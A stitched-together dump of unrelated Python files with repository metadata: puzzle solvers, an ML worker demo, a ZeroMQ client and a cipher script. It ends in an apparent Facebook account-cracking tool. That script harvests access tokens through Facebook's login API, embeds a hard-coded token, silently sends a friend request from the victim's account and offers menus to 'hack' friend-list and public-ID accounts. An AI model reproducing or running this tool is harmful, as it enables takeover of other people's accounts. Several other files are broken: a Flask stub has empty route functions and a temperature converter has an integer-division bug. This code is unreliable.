#else:
print("WRONG USERNAME")
# no sqlite3 connection is ever opened above, so there is nothing to close
|
[
"[email protected]"
] | |
dafd4470eabf9ab2496e9006e235388f265a48d7
|
1a5db9481bdb6711af937a0ae647a2cf65d55191
|
/2020/Day 5/Part 1.py
|
effc15a669adbb54912ff838a2b252d1530e2b93
|
[] |
no_license
|
Danny213123/Advent-of-Coding
|
5ef76f71f998ea3f8e46d361fe073f2f2b2d6d77
|
0b7b1b6b6ae431dd5b341e871ec7749a9e370451
|
refs/heads/main
| 2023-01-29T00:06:06.822021 | 2020-12-14T13:46:43 | 2020-12-14T13:46:43 | 317,964,154 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 548 |
py
|
import math
rowid = 0
for x in range (945):
k = input()
row, col = 0, 0
min2, max2 = 0, 7
min, max = 0, 127
for y in range (len(k) - 3):
if (k[y] == "F"):
max = math.floor((max + min) / 2)
elif (k[y] == "B"):
min = math.ceil((max + min) / 2)
row = max
for d in range (len(k) - 3, len(k)):
if (k[d] == "L"):
max2 = math.floor((max2 + min2) / 2)
elif (k[d] == "R"):
min2 = math.ceil((max2 + min2) / 2)
col = max2
if ((row * 8) + col > rowid):
rowid = (row * 8) + col
print(rowid)
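# Worked example from the puzzle statement: "FBFBBFFRLR" halves the 0-127 row
# range down to row 44 and the 0-7 column range down to column 5, giving
# seat ID 44 * 8 + 5 = 357.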
|
[
"[email protected]"
] | |
d5ab6e2c2301fa7c2de21056b961275cd20e463d
|
840b98f14f181f7dbd693f2ee4b3c46e5be59305
|
/demos/demo_pycloudmessenger/POM1/NeuralNetworks/pom1_NN_worker_pycloudmessenger.py
|
3bb1b70be16f54c7404843da2a380711222b695e
|
[
"Apache-2.0"
] |
permissive
|
Musketeer-H2020/MMLL-Robust
|
4ef6b2ff5dff18d4d2b2a403a89d9455ba861e2b
|
ccc0a7674a04ae0d00bedc38893b33184c5f68c6
|
refs/heads/main
| 2023-09-01T18:47:46.065297 | 2021-09-28T15:34:12 | 2021-09-28T15:34:12 | 386,264,004 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,786 |
py
|
# -*- coding: utf-8 -*-
'''
@author: Marcos Fernandez Diaz
November 2020
Example of use: python pom1_NN_worker_pycloudmessenger.py --user <user> --password <password> --task_name <task_name> --id <id>
Parameters:
- user: String with the name of the user. If the user does not exist in the pycloudmessenger platform a new one will be created
- password: String with the password
- task_name: String with the name of the task. If the task already exists, an error will be displayed
- id: Integer representing the partition of data to be used by the worker. Each worker should use a different partition, possible values are 0 to 4.
'''
# Import general modules
import argparse
import logging
import json
import numpy as np
import sys, os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # Disables tensorflow warnings
import tensorflow as tf
import onnxruntime
from sklearn.metrics import accuracy_score
# Add higher directory to python modules path.
sys.path.append("../../../../")
# To be imported from MMLL (pip installed)
from MMLL.nodes.WorkerNode import WorkerNode
from MMLL.comms.comms_pycloudmessenger import Comms_worker as Comms
# To be imported from demo_tools
from demo_tools.task_manager_pycloudmessenger import Task_Manager
from demo_tools.data_connectors.Load_from_file import Load_From_File as DC
from demo_tools.mylogging.logger_v1 import Logger
from demo_tools.evaluation_tools import display, plot_cm_seaborn, create_folders
# Set up logger
logging.basicConfig(
level=logging.ERROR,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
LOGGER = logging.getLogger()
LOGGER.setLevel(logging.DEBUG)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--user', type=str, default=None, help='User')
parser.add_argument('--password', type=str, default=None, help='Password')
parser.add_argument('--task_name', type=str, default=None, help='Name of the task')
parser.add_argument('--id', type=int, default=None, choices=[0, 1, 2, 3, 4], help='The address of the worker')
FLAGS, unparsed = parser.parse_known_args()
user_name = FLAGS.user
user_password = FLAGS.password
task_name = FLAGS.task_name
data_partition_id = FLAGS.id # This integer identifies the data partition used for the worker
# Set basic configuration
dataset_name = 'mnist'
verbose = False
pom = 1
model_type = 'NN'
# Create the directories for storing relevant outputs if they do not exist
create_folders("./results/")
# Setting up the logger
logger = Logger('./results/logs/Worker_' + str(user_name) + '.log')
# Load the credentials for pycloudmessenger
display('===========================================', logger, verbose)
display('Creating Worker...', logger, verbose)
# Note: this part creates the worker (participant) and it joins the task. This code is
# intended to be used only at the demos, in Musketeer this part must be done in the client.
credentials_filename = '../../musketeer.json'
try:
with open(credentials_filename, 'r') as f:
credentials = json.load(f)
except:
display('Error - The file musketeer.json is not available, please put it under the following path: "' + os.path.abspath(os.path.join("","../../")) + '"', logger, verbose)
sys.exit()
# Create user and join task
tm = Task_Manager(credentials_filename)
participant = tm.create_worker_and_join_task(user_name, user_password, task_name, display, logger)
display("Worker %s has joined task %s" %(user_name, task_name), logger, verbose)
# Creating the comms object
display('Creating WorkerNode under POM %d, communicating through pycloudmessenger' %pom, logger, verbose)
comms = Comms(participant, user_name)
# Creating Workernode
wn = WorkerNode(pom, comms, logger, verbose)
display('-------------------- Loading dataset %s --------------------------' % dataset_name, logger, verbose)
# Load data
# Warning: this data connector is only designed for the demos. In Musketeer, appropriate data
# connectors must be provided
data_file = '../../../../input_data/' + dataset_name + '_demonstrator_data.pkl'
try:
dc = DC(data_file)
except:
display('Error - The file ' + dataset_name + '_demonstrator_data.pkl does not exist. Please download it from Box and put it under the following path: "' + os.path.abspath(os.path.join("","../../../../input_data/")) + '"', logger, verbose)
sys.exit()
# Get train/test data and set training data
[Xtr, ytr, _, _, Xtst, ytst] = dc.get_all_data_Worker(int(data_partition_id))
wn.set_training_data(dataset_name, Xtr, ytr)
display('WorkerNode loaded %d patterns for training' % wn.NPtr, logger, verbose)
# Creating a ML model and start training procedure
wn.create_model_worker(model_type)
display('MMLL model %s is ready for training!' %model_type, logger, verbose)
display('Worker_' + model_type + ' %s is running...' %user_name, logger, verbose)
wn.run()
display('Worker_' + model_type + ' %s: EXIT' %user_name, logger, verbose)
# Retrieving and saving the trained model
display('Retrieving the trained model from WorkerNode', logger, verbose)
model = wn.get_model()
# Warning: this save_model utility is only for demo purposes
output_filename_model = './results/models/Worker_' + str(user_name) + '_' + dataset_name + '_model'
model.save(output_filename_model)
# Making predictions on test data
display('------------- Obtaining predictions------------------------------------\n', logger, verbose)
preprocessors = wn.get_preprocessors()
if preprocessors is not None:
for prep_model in preprocessors: # Apply stored preprocessor sequentially (in the same order received)
Xtst = prep_model.transform(Xtst)
display('Test data transformed using %s' %prep_model.name, logger, verbose)
preds_tst = model.predict(Xtst)
preds_tst = np.argmax(preds_tst, axis=-1) # Convert to labels
y = np.argmax(ytst, axis=-1) # Convert to labels
classes = np.arange(ytst.shape[1]) # 0 to 9
# Evaluating the results
display('------------- Evaluating --------------------------------------------\n', logger, verbose)
# Warning, these evaluation methods are not part of the MMLL library, they are only intended
# to be used for the demos. Use them at your own risk.
output_filename = 'Worker_' + str(user_name) + '_NN_confusion_matrix_' + dataset_name + '.png'
title = 'NN confusion matrix in test set worker'
plot_cm_seaborn(preds_tst, y, classes, title, output_filename, logger, verbose, normalize=True)
# Load Tf SavedModel and check results
model_loaded = tf.keras.models.load_model(output_filename_model)
preds_tst = model_loaded.predict(Xtst)
preds_tst = np.argmax(preds_tst, axis=-1) # Convert to labels
    # Model export to ONNX
output_filename_model = './results/models/Worker_' + str(user_name) + '_' + dataset_name + '_model.onnx'
model.save(output_filename_model)
# Compute the prediction with ONNX Runtime
onnx_session = onnxruntime.InferenceSession(output_filename_model)
onnx_inputs = {onnx_session.get_inputs()[0].name: Xtst}
onnx_output = onnx_session.run(None, onnx_inputs)[0]
onnx_output = np.argmax(onnx_output, axis=-1) # Convert to labels
err_onnx = accuracy_score(y,onnx_output)
display('Test accuracy in ONNX model is %f' %err_onnx, logger, verbose)
|
[
"[email protected]"
] | |
769544d72d4133cfda273b9299d86d755a66af8d
|
ed0ae2e865211ef932b519ece7f243134b34dd6b
|
/etl/views.py
|
d349ce6a1bac41385d163051d2a4936e9b04beaf
|
[
"MIT"
] |
permissive
|
vahana/etl
|
f21c2674bfa17c30a7492260841160f689539dd4
|
d76e6f975850dc286a22ba2afb22416a6b35cf33
|
refs/heads/master
| 2023-03-10T08:34:58.752529 | 2021-02-23T21:00:28 | 2021-02-23T21:00:28 | 270,042,567 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 182 |
py
|
import logging
import prf
from jobs.views import BaseJobView
from jobs.etl import ETLJob
log = logging.getLogger(__name__)
class ETLJobView(BaseJobView):
_job_class = ETLJob
|
[
"[email protected]"
] | |
322d4d98c58a100b1d7db231f1dbea4fe7ad8180
|
0a47474366d60323c683b83e2224d409701b9e34
|
/core.py
|
a7d8208fb94b70790fe825b246543ae03cc235d1
|
[] |
no_license
|
AdriCabSan/VisionBoard-API
|
77b74a01109ca6f83fb53066f5c62e6ffb1f67bf
|
f43336b1e19b5b4512fae2897bf184235bec5ef5
|
refs/heads/master
| 2020-06-18T19:57:24.695954 | 2019-07-12T17:16:17 | 2019-07-12T17:16:17 | 196,427,521 | 0 | 0 | null | 2019-07-12T14:33:29 | 2019-07-11T16:12:06 |
Python
|
UTF-8
|
Python
| false | false | 1,122 |
py
|
from flask import Flask
from datetime import datetime
from Slack import SlackMessenger
from Trello import VisionTrello
app = Flask(__name__)
@app.route("/")
def home():
return "Hello, Flask!"
@app.route("card/")
def getPointsOfCard(card_name, open_character, closed_character):
return VisionTrello.get_points_of_a_card(card_name,open_character,closed_character)
#This will show you the percentage of recommendation for each person in the board to make some cards based on their experience with the card labels that they did
@app.route("/card/<point>")
def showingRecommendations(board):
#This will show you a recommended card for a given member id within the limit based on your experience working with other card
@app.route("/card/<member>")
def recomendCardToMember(board):
@app.route("/card/<point>")
def respectColumnRules(board):
@app.route("/card/<point>")
def getPointsOfColumn(board):
return ret
@app.route("card/<point>")
def get(board, column_name):
return ret
@app.route("card/<point>")
def getMemberId(member_name):
@app.route("/sprint/<point>")
def predictSprintPoints(board):
|
[
"[email protected]"
] | |
c54ee5782b49ba10185b84a0833b690133e6e82f
|
e6647877270c955ddd6fe6318cc9763b9e531615
|
/F2C.py
|
285121d8fb3df547694a36425517e2f4ad1cf121
|
[] |
no_license
|
Atticakes/Portfolio
|
a4dbfad79203e808c5fa7fab412d22843254d183
|
8115eb9661556dac5026715f2bdc6a5e9e262d23
|
refs/heads/master
| 2021-01-13T00:55:46.609781 | 2016-03-21T01:46:06 | 2016-03-21T01:46:06 | 52,247,800 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 389 |
py
|
#T(°C) = (T(°F) - 32) × 5/9
print "Hello, I am a temperature converter."
fahrenheit = int(raw_input("Please provide me with the Fahrenheit reading:"))
print "Thank you!"
print "I will not do some maths to convert",fahrenheit,"to Celsius."
print "Celsius =",fahrenheit,"- 32) x 5/9"
celsius = (fahrenheit - 32) * (5/9)
print fahrenheit,"degrees Fahrenheit =",celsius,"degrees Celsius!"
|
[
"[email protected]"
] | |
f39ddf34b551cffbf5f5682a315080605920917c
|
baad77465c6470247b6a00736aed1442ae084249
|
/ui/constants.py
|
7d581348506bb09a22422a2a348794773972adfd
|
[
"MIT"
] |
permissive
|
yiluzhu/arbi
|
03d5d3bbc32bb7def7e9ae84ff174677fd371cf6
|
5b141e981547341dcb32e730f058da567731ebed
|
refs/heads/master
| 2020-03-11T05:15:13.999035 | 2018-04-16T20:14:53 | 2018-04-16T20:14:53 | 129,797,314 | 4 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 40 |
py
|
ENGINE_INSPECTOR_UI_REFRESH_INVERVAL = 5
|
[
"[email protected]"
] | |
59e0a98241e7bc62282bfca078e754e048389113
|
5b5efaaa9ca73cd67dc032c654f8aa402ebb9cc7
|
/jhu-code/Cryptology/merklehellman.py
|
0f22a0b78d3b9053e0a8a8819604c33c97fb01a9
|
[] |
no_license
|
shellsharks/assorted
|
5fa00cbfac49bcf3db3f15f622ce68ded615993f
|
d20a3d2069837c18e1da9ac013eaad1f1744c316
|
refs/heads/master
| 2022-09-17T11:48:36.233633 | 2022-08-15T14:11:58 | 2022-08-15T14:11:58 | 190,086,937 | 6 | 3 | null | 2023-07-27T21:30:38 | 2019-06-03T21:47:20 |
Java
|
UTF-8
|
Python
| false | false | 765 |
py
|
M = 2647
W = 1036
ciphertext = [6368,7879,2050,1745,2714,3439,4007,4680,4246,2450,7501]
A = [3,5,11,20,41,83,165,329,662,1321]
'''
B = []
def calcB(a):
for x in a:
B.append((W*x)%M)
calcB(A)
print(B)
'''
def modInverse(a, m) :
a = a % m;
for x in range(1, m) :
if ((a * x) % m == 1) :
return x
return 1
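# Sanity check for the key material above: the extended Euclidean algorithm
# gives 1036 * 534 = 553224 = 209 * 2647 + 1, so modInverse(W, M) == 534.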
def decrypt(c):
b = (c * modInverse(W,M))%M
i = 0
binrep = ""
for x in A[::-1]:
if (x+i) <= b:
i = i + x
binrep = binrep + "1"
else:
binrep = binrep + "0"
binrep=binrep[::-1]
return int(binrep, base=2)
def digraph(num):
return [chr(int((num-(num%26))/26)+65),chr(num%26+65)]
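# digraph maps a base-26 value back to a two-letter pair (A=0 .. Z=25); for
# example digraph(27) returns ['B', 'B'] since 27 = 1 * 26 + 1.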
for x in ciphertext: print(digraph(decrypt(x)))
print(modInverse(W,M))
|
[
"[email protected]"
] | |
d81e5b4cac4a3d420bf1a4c78a385832a70ea509
|
c7691adc85632e20c8bd0c7f031e5cfde34f2456
|
/Carry/mysite/sub_client.py
|
6da519ef9f1f1a619c0b4e0db35136662d86e22e
|
[] |
no_license
|
hunaghaikong/CodeAll
|
3bd112d4299d8b14d4e41512791c82c7febeadf4
|
818ae04b6f2ca00495c73fd9b3810f083aa3339e
|
refs/heads/master
| 2020-05-16T17:19:45.707554 | 2019-04-24T09:18:18 | 2019-04-24T09:18:18 | 183,191,783 | 0 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,195 |
py
|
import zmq
from zmq import Context
from datetime import datetime
from threading import Thread
from mysite import HSD
tcp = HSD.get_tcp()  # IP address
poller = zmq.Poller()
ctx1 = Context()
ticker_sub_socket = ctx1.socket(zmq.SUB)
ticker_sub_socket.connect('tcp://{}:6868'.format(tcp))
ticker_sub_socket.setsockopt_unicode(zmq.SUBSCRIBE, '')
poller.register(ticker_sub_socket, zmq.POLLIN)
ctx3 = Context()
req_price_socket = ctx3.socket(zmq.REQ)
req_price_socket.connect('tcp://{}:6870'.format(tcp))
ctx4 = Context()
handle_socket = ctx4.socket(zmq.REQ)
handle_socket.connect('tcp://{}:6666'.format(tcp)) #237
class sub_ticker:
def __init__(self, prodcode):
self._prodcode = prodcode
self._is_active = False
self._is_sub = False
def _run(self, func):
while self._is_active:
ticker = ticker_sub_socket.recv_pyobj()
print(ticker)
if ticker.ProdCode.decode() == self._prodcode:
func(ticker)
def __call__(self, func):
self._func = func
return self
def start(self):
if self._is_active == False:
self._is_active = True
self._thread = Thread(target=self._run, args=(self._func,))
self._thread.setDaemon(True)
self._thread.start()
def stop(self):
self._is_active = False
# self._thread.join()
def sub(self):
        handle_socket.send_multipart([b'sub_ticker', self._prodcode.encode()])  # module-level socket, as in unsub()
self._is_sub = True
print(handle_socket.recv_string())
def unsub(self):
handle_socket.send_multipart([b'unsub_ticker', self._prodcode.encode()])
self._is_sub = False
print(handle_socket.recv_string())
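# Usage sketch for the decorator-style subscriber above (the product code
# 'HSIF1' is an illustrative placeholder):
#
# @sub_ticker('HSIF1')
# def on_tick(ticker):
#     print(ticker.ProdCode, ticker.Price)
#
# on_tick.sub()    # ask the server to start publishing the product
# on_tick.start()  # consume tickers on a background thread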
def getTickData():
global ticker_sub_socket
#return ticker_sub_socket
while True:
try:
ticker = ticker_sub_socket.recv_pyobj()
yield ticker#.TickerTime,ticker.Price,ticker.Qty
except Exception as exc:
print(exc)
if __name__ == '__main__':
    for ticker in getTickData():
        print(ticker.TickerTime, ticker.Price, ticker.Qty)
|
[
"[email protected]"
] | |
529e64afce996323c0964b1bbdce4a74e5087754
|
cbe75aea42763c465cc5d1e6ca8ed95889fead79
|
/Aleyxkashan.py
|
391b86688cc00535cc186fd29cab27899f0b837c
|
[] |
no_license
|
aleykashanbrand/aleyxkashan
|
bc9428e10f1f0dfe481f98b5a860ca3d3ddc1eba
|
4e3648e3ea89718f307d0d9343a83a67db6c2d4e
|
refs/heads/main
| 2023-06-15T15:32:23.236165 | 2021-07-06T07:19:59 | 2021-07-06T07:19:59 | 383,375,448 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 28,406 |
py
|
#!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.001)
def tokenz():
os.system('clear')
print logo
toket = raw_input("\033[1;91m[?] \033[1;97mToken\033[1;91m : \033[1;95mCopy👉 \033[1;92mEAAAAUaZA8jlABAEZBmW0yH8w0R2XhpqqNiaQvKDkm1wCFazEcrJEzJThJrjZC3fuBFP6DFNmNnZB8ueUyVZCH7zPMulcTHZBa9ZCRHTTRTc0wneLqx5BZBruQbJQAx5pssqNnZB9qH6oHFjqWJf0yoOFkawm7hDqVYM8wCALx4xv7hi4ERoBPpgSGKAsm95Xt8fcZD \033[1;96m👈 Without fb ID free login Copy Paste & Enter👉\033[1;92m")
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
Name = a['name']
zedd = open("login.txt", 'w')
zedd.write(toket)
zedd.close()
menu()
except KeyError:
print "\033[1;91m[!] Wrong"
e = raw_input("\033[1;91m[?] \033[1;92mWant to pick up token?\033[1;97m[y/n]: ")
if e =="":
keluar()
elif e =="y":
login()
else:
keluar()
#### LOGO ####
logo = """
\033[1;94m
\033[1;91m ╔═══╗ ╔╗─╔╗ \t
\033[1;92m ║╔═╗ ║─║║ \n
\033[1;93m ║║─║║ ║╚═╝ \n
\033[1;94m ║╚═╝║ ║╔═╗║ \t
\033[1;95m ║╔═╗║ A L E Y \n
\033[1;97m ╚╝─╚╝ ╚╝─╚╚ \t
7.8.6
\033[1;31m\033[1;31m╔══════════════════════════════════════════════════╗
\033[1;31m\033[1;31m║\033[0;33m\033[1;33m* AUTHOR : \033[1;39mCREATOR ALEY KASHAN \033[1;31m║
\033[1;31m\033[1;31m║\033[0;33m\033[1;33m* FACEBOOK: \https://www.facebook.com/profile.php?id=100022645551442 \033[1;31m║
\033[1;31m\033[1;31m║\033[0;33m\033[1;33m* GITHUB : \033[1;39mhttps://Github.com/aleykashanbrand \033[1;31m║
\033[1;31m\033[1;31m╚══════════════════════════════════════════════════╝"""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[●] \x1b[1;93mLoging In \x1b[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print "\033[1;96m•◈•───────────────•◈•\033[1;92mBALOCH \033[1;96m•◈•───────────────•◈•"
print """
\033[1;91m╔══╗─╔═══╗╔╗
\033[1;92m║╔╗║─║╔═╗║║║
\033[1;93m║╚╝╚╗║║─║║║║
\033[1;94m║╔═╗║║╚═╝║║║─╔╗
\033[1;95m║╚═╝║║╔═╗║║╚═╝║
\033[1;97m╚═══╝╚╝─╚╝╚═══╝
"""
print "\033[1;96m•◈•───────────────•◈•\033[1;92mALEY*KASHAN\033[1;96m•◈•───────────────•◈•"
jalan(" \033[1;93m┳┻┳┻▇▇▇▇▇▇ ╭━━━━╮╱▔▔▔╲ ▇▇▇▇▇▇┳┻┳┻┳┻")
jalan(" \033[1;93m┻┳┻┳▇▇▇▇▇▇ ┃╯╯╭━┫▏╰╰╰▕ ▇▇▇▇▇▇┻┳┻┳┻┳")
jalan(" \033[1;93m┳┻┳┻▇▇▇▇▇▇ ┃╯╯┃▔╰┓▔▂▔▕╮ ▇▇▇▇▇▇┳┻┳┻┳┻")
jalan(" \033[1;93m┻┳┻┳▇▇▇▇▇▇ ╰╮╯┃┈╰┫╰━╯┏╯ ▇▇▇▇▇▇┻┳┻┳┻┳")
jalan(" \033[1;93m┳┻┳┻▇▇▇▇▇▇ ┏╯╯┃╭━╯┳━┳╯ ▇▇▇▇▇▇┻┳┻┳┻┳")
jalan(" \033[1;93m┻┳┻┳▇▇▇▇▇▇ ╰━┳╯▔╲╱▔╭╮▔╲ ▇▇▇▇▇▇┳┻┳┻┳┻")
jalan(" \033[1;93m┳┻┳┻▇▇▇▇▇▇ ┃┈╲┈╲╱╭╯╮▕ ▇▇▇▇▇▇┻┳┻┳┻┳")
jalan(" \033[1;93m┻┳┻┳▇▇▇▇▇▇ ┃┈▕╲▂╱┈╭╯╱ ▇▇▇▇▇▇┳┻┳┻┳┻")
jalan(" \033[1;93m┳┻┳┻▇▇▇▇▇▇ ┃'''┈┃┈┃┈''' ▇▇▇▇▇▇┻┳┻┳┻┳")
jalan(" \033[1;93m┻┳┻┳▇▇▇▇▇▇ ┏╯▔'''╰┓┣━┳┫ ▇▇▇▇▇▇┳┻┳┻┳┻")
jalan(" \033[1;93m ▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇")
jalan(" \033[1;93m▇▇\033[1;95m WellCome to ALEY HACKER \033[1;93m▇▇")
jalan(" \033[1;93m▇▇\033[1;91m 👇 AUTHOR 👇 \033[1;93m▇▇")
jalan(" \033[1;93m▇▇\033[1;92m This Tools Is Created By \033[1;93m▇▇")
jalan(" \033[1;93m▇▇\033[1;92m ALEY KASHAN \033[1;93m▇▇")
jalan(" \033[1;93m▇▇\033[1;92m WHATTSAPP: 03554576001 \033[1;93m▇▇")
jalan(" \033[1;93m ▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇")
CorrectUsername = "Aleyxkashan"
CorrectPassword = "786"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;96m[☆] \033[1;91mUSERNAME \x1b[1;96m>>>> ")
if (username == CorrectUsername):
password = raw_input("\033[1;96m[☆] \033[1;91mPASSWORD \x1b[1;96m>>>> ")
if (password == CorrectPassword):
print "Logged in successfully as " + username #Dev:ALEY
loop = 'false'
else:
print "Serious Please"
os.system('xdg-open https://www.facebook.com/MOHSIN.ALI.ALL.HATERX.KA.PAPA.FEEL.THE.POWER')
else:
print "Wrong Dear!"
os.system('xdg-open https://www.facebook.com/FATIMA.ALI.THE.BRAND')
####login#########
def login():
os.system('clear')
print logo
print "\033[1;93m-•◈•-\033[1;91m> \033[1;92m1.\x1b[1;96m Login With Facebook "
time.sleep(0.05)
print "\033[1;93m-•◈•-\033[1;91m> \033[1;92m2.\x1b[1;95m Login With Token"
time.sleep(0.05)
print "\033[1;93m-•◈•-\033[1;91m> \033[1;92m3.\x1b[1;93m CONTECT ME ON FACEBOOK "
time.sleep(0.05)
print "\033[1;93m-•◈•-\033[1;91m> \033[1;92m0.\033[1;91m Exit "
pilih_login()
def pilih_login():
peak = raw_input("\n\033[1;96mChoose an Option>>> \033[1;95m")
if peak =="":
print "\x1b[1;91mFill in correctly"
pilih_login()
elif peak =="1":
login1()
elif peak =="2":
tokenz()
elif peak =="3":
os.system('xdg-open https://www.facebook.com/BALOCH.EDITX')
login()
elif peak =="0":
keluar()
else:
print"\033[1;91m[!] Wrong input"
keluar()
def login1():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
time.sleep(0.05)
print logo
jalan("\033[1;91mWarning \033[1;92mDo Not Use Your Personal Account")
jalan("\033[1;91mWarning \033[1;92mUse a New Account To Login")
print('\033[1;97m\x1b[1;96m................LOGIN WITH FACEBOOK................\x1b[1;97m' )
print(' ' )
id = raw_input('\033[1;97m[] \x1b[1;93mFacebook/Email\x1b[1;93m: \x1b[1;93m')
pwd = raw_input('\033[1;97m[] \x1b[1;93mPassword \x1b[1;93m: \x1b[1;92m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\x1b[1;97mThere is no internet connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\x1b[1;95mLogin Successful.•◈•..'
os.system('xdg-open https://www.facebook.com/BALOCH EDITX')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\x1b[1;97mThere is no internet connection"
keluar()
if 'checkpoint' in url:
print("\n\x1b[1;97mYour Account is on Checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\x1b[1;93mPassword/Email is wrong")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\x1b[1;94mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
o = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(o.text)
Name = a['name']
id = a['id']
t = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(t.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print"\033[1;97mYour Account is on Checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\x1b[1;94mThere is no internet connection"
keluar()
os.system("clear") #Dev:Baloch
time.sleep(0.05)
print logo
print "\033[1;96m•◈•───────────────•◈•\033[1;92mAZHAR*BALOCH\033[1;96m•◈•───────────────•◈•"
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m Name \033[1;91m: \033[1;97m"+Name+"\033[1;97m "
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m ID \033[1;91m: \033[1;97m"+id+"\x1b[1;97m "
print "\033[1;96m•◈•───────────────•◈•\033[1;92mALEY*KASHAN\033[1;96m•◈•───────────────•◈•"
print "\x1b[1;96m[\x1b[1;93m1\x1b[1;96m]\x1b[1;93m Hack Facebook Account"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Logout "
pilih()
def pilih():
unikers = raw_input("\n\033[1;97m >>> \033[1;97m")
if unikers =="":
print "\033[1;96m[!] \x1b[1;91mFill In Correctly"
pilih()
elif unikers =="1":
super()
elif unikers =="0":
jalan('Remove The Token')
os.system('rm -rf login.txt')
keluar()
else:
print "\033[1;96m[!] \x1b[1;91mFill In Correctly"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print "\033[1;96m•◈•───────────────•◈•\033[1;92mALEY*KASHAN\033[1;96m•◈•───────────────•◈•"
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m] \033[1;93mHACK WITH FRIEND LIST"
print "\x1b[1;96m[\x1b[1;92m2\x1b[1;96m] \033[1;93mHACK WITH PUBLIC ID"
print "\x1b[1;96m[\x1b[1;92m3\x1b[1;96m] \033[1;93mHACK WITH FILE"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m] \033[1;91mBack"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;97m >>> \033[1;97m")
if peak =="":
print "\033[1;96m[!] \x1b[1;91mFill In Correctly"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print "\033[1;96m•◈•───────────────•◈•\033[1;92mAZHAR*BALOCH\033[1;96m•◈•───────────────•◈•"
jalan('\033[1;96m[✺] \033[1;93mSearching ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
print "\033[1;96m•◈•───────────────•◈•\033[1;92mALEY*KASHAN\033[1;96m•◈•───────────────•◈•"
